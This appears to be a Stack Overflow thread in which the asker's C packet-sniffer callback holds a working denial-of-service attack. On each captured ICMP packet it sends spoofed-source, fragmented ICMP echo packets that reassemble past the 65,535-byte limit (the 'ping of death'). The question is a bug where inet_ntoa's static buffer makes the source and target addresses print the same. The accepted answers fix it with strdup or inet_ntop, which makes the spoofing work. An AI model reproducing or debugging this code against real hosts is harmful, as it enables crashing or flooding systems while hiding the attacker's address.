# Why do the 2 strings print the same value when I assigned them different values?

Tags: c, string, packet, icmp, spoof

```
void
got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet)
{

static int count = 1;                   /* packet counter */

/* declare pointers to packet headers */
const struct sniff_ethernet *ethernet;  /* The ethernet header [1] */
const struct sniff_ip *ip;              /* The IP header */
const struct sniff_tcp *tcp;            /* The TCP header */
const char *payload;                    /* Packet payload */

int size_ip;
int size_tcp;
int size_payload;

printf("\nPacket number %d:\n", count);
count++;

/* define ethernet header */
ethernet = (struct sniff_ethernet*)(packet);

/* define/compute ip header offset */
ip = (struct sniff_ip*)(packet + SIZE_ETHERNET);
size_ip = IP_HL(ip)*4;
if (size_ip < 20) {
    printf("   * Invalid IP header length: %u bytes\n", size_ip);
    return;
}

/* print source and destination IP addresses */
printf("       From: %s\n", inet_ntoa(ip->ip_src));//<-------------------------
printf("         To: %s\n", inet_ntoa(ip->ip_dst));//<------------------------

/* determine protocol */    
switch(ip->ip_p) {
    case IPPROTO_TCP:
        printf("   Protocol: TCP\n");
        break;
    case IPPROTO_UDP:
        printf("   Protocol: UDP\n");
        return;
    case IPPROTO_ICMP:
        printf("   Protocol: ICMP\n");

     /*********************************************************************************************/

    char *sinfo[1];
sinfo[0] = inet_ntoa(ip->ip_src);//<----------------------------

char *dinfo[1];
dinfo[0] = inet_ntoa(ip->ip_dst);//<----------------------------

int s, i;
char buf[400];
struct ip *ip = (struct ip *)buf;
struct icmphdr *icmp = (struct icmphdr *)(ip + 1);
struct hostent *hp, *hp2;
struct sockaddr_in dst;
int offset;
int on;
//int num = 5;

 printf("%s- saddress is the spoofed source address\n", sinfo[0]);
 printf("%s- dstaddress is the target\n", dinfo[0]);
 printf("- number is the number of packets to send, 2 is the default\n");

/* Loop based on the packet number */
for(i=1;i<=2;i++)
{
        on = 1;
    bzero(buf, sizeof(buf));

       /* Create RAW socket */
       if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
       {
        perror("socket() error");
        /* If something wrong, just exit */
            exit(1);
       }

       /* socket options, tell the kernel we provide the IP structure */
       if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0)
       {
            perror("setsockopt() for IP_HDRINCL error");
            exit(1);
       }

       if((hp = gethostbyname(dinfo[0])) == NULL)
       {
            if((ip->ip_dst.s_addr = inet_addr(dinfo[0])) == -1)
            {
                fprintf(stderr, "%s: Can't resolve, unknown host.\n", dinfo[0]);
                exit(1);
            }   
       }
    else
        bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);

    /* The following source address just redundant for target to collect */
    if((hp2 = gethostbyname(sinfo[0])) == NULL)
    {
     if((ip->ip_src.s_addr = inet_addr(sinfo[0])) == -1)
     {
         fprintf(stderr, "%s: Can't resolve, unknown host\n", sinfo[0]);
         exit(1);
     }
    }
    else
        bcopy(hp2->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length);

    printf("Sending to %s from spoofed %s\n", inet_ntoa(ip->ip_dst), sinfo[0]);

    /* Ip structure, check the ip.h */
    ip->ip_v = 4;
    ip->ip_hl = sizeof*ip >> 2;
    ip->ip_tos = 0;
    ip->ip_len = htons(sizeof(buf));
    ip->ip_id = htons(4321);
    ip->ip_off = htons(0);
    ip->ip_ttl = 255;
    ip->ip_p = 1;
    ip->ip_sum = 0; /* Let kernel fills in */

    dst.sin_addr = ip->ip_dst;
    dst.sin_family = AF_INET;

    icmp->type = ICMP_ECHO;
    icmp->code = 0;
    /* Header checksum */
    icmp->checksum = htons(~(ICMP_ECHO << 8));

    for(offset = 0; offset < 65536; offset += (sizeof(buf) - sizeof(*ip)))
    {
    ip->ip_off = htons(offset >> 3);

    if(offset < 65120)
     ip->ip_off |= htons(0x2000);
    else
      ip->ip_len = htons(418); /* make total 65538 */

    /* sending time */
    if(sendto(s, buf, sizeof(buf), 0, (struct sockaddr *)&dst, sizeof(dst)) < 0)
    {
       fprintf(stderr, "offset %d: ", offset);
       perror("sendto() error");
    }
 else
   printf("sendto() is OK.\n");

    /* IF offset = 0, define our ICMP structure */
    if(offset == 0)
    {
    icmp->type = 0;
    icmp->code = 0;
    icmp->checksum = 0;
    }
   }
  /* close socket */
  close(s);
  sleep(300);
 }
//    return 0;
//}

/******************************************************************************************/


        return;
    case IPPROTO_IP:
        printf("   Protocol: IP\n");
        return;
    default:
        printf("   Protocol: unknown\n");
        return;
} 

/*
 *  OK, this packet is TCP.
 */

/* define/compute tcp header offset */
tcp = (struct sniff_tcp*)(packet + SIZE_ETHERNET + size_ip);
size_tcp = TH_OFF(tcp)*4;
if (size_tcp < 20) {
    printf("   * Invalid TCP header length: %u bytes\n", size_tcp);
    return;
}

printf("   Src port: %d\n", ntohs(tcp->th_sport));
printf("   Dst port: %d\n", ntohs(tcp->th_dport));

/* define/compute tcp payload (segment) offset */
payload = (u_char *)(packet + SIZE_ETHERNET + size_ip + size_tcp);

/* compute tcp payload (segment) size */
size_payload = ntohs(ip->ip_len) - (size_ip + size_tcp);

/*
 * Print payload data; it might be binary, so don't just
 * treat it as a string.
 */
if (size_payload > 0) {
    printf("   Payload (%d bytes):\n", size_payload);
    print_payload(payload, size_payload);
}

return;
}
```

In the above code I am trying to save the 2 ip addresses. One is the source ip address and the other is the destination ip address. Ive created 2 strings and store the source address in the string variable sinfo and the destination address in the variable labeled dinfo. However, sinfo and dinfo output the same address. Here is the output:

Packet number 1:

From: 192.168.29.138

To: 192.168.0.130

Protocol: ICMP

192.168.0.130- saddress is the spoofed source address

192.168.0.130- dstaddress is the target

- number is the number of packets to send, 2 is the default

Sending to 192.168.0.130 from spoofed 192.168.0.130

It prints out correctly for From: and To: but not for sinfo and dinfo. I don't know what the problem is.

Answer (score 5, accepted):

`inet_ntoa()` returns a pointer to a static buffer, so the second call overwrites the result from the first call:

```
char *sinfo[1];
sinfo[0] = inet_ntoa(ip->ip_src);

char *dinfo[1];
dinfo[0] = inet_ntoa(ip->ip_dst);
```

`dinfo[0]` and `sinfo[0]` now both point to the same (static) buffer - the buffer only contains the result from the second call. You need to copy the result from inet_ntoa() into your own buffer (I am also not sure why you are using an array of pointers of size 1, a simple pointer should be sufficient):

```
char *sinfo = strdup(inet_ntoa(ip->ip_src));
char *dinfo = strdup(inet_ntoa(ip->ip_dst));
...
free(sinfo);
free(dinfo);
```

---

As proposed by @cnicutar, you can alternatively use [inet_ntop](http://www.beej.us/guide/bgnet/output/html/multipage/inet_ntopman.html) which does not use a static buffer, but allows you to pass the destination buffer directly:

```
char str[INET_ADDRSTRLEN];
inet_ntop(AF_INET, &addr, str, INET_ADDRSTRLEN);
```

Also, `inet_ntoa()` does not handle **IPv6**, while `inet_ntop()` does.

Comment: Thanks for your answer Andreas. Do you have a suggestion on how to fix this problem?

Comment: See my edited answer - @cnicutar posted the same solution why I was still editing :)

Answer (score 4):

You shouldn't store the value returned by `inet_ntoa`, as it is rewritten by subsequent calls:

> APPLICATION USAGE
>
> The return value of inet_ntoa() may point to static data that may be overwritten
>   by subsequent calls to inet_ntoa().

Instead you should use `strdup`:

```
sinfo[0] = strdup(inet_ntoa(ip->ip_src));
```

And remember to `free(sinfo[0])`. Same goes for `dinfo[0]`.

---

All that being said, migrating to the recommended **`inet_ntop` is better** on many levels and will also solve your specific problem.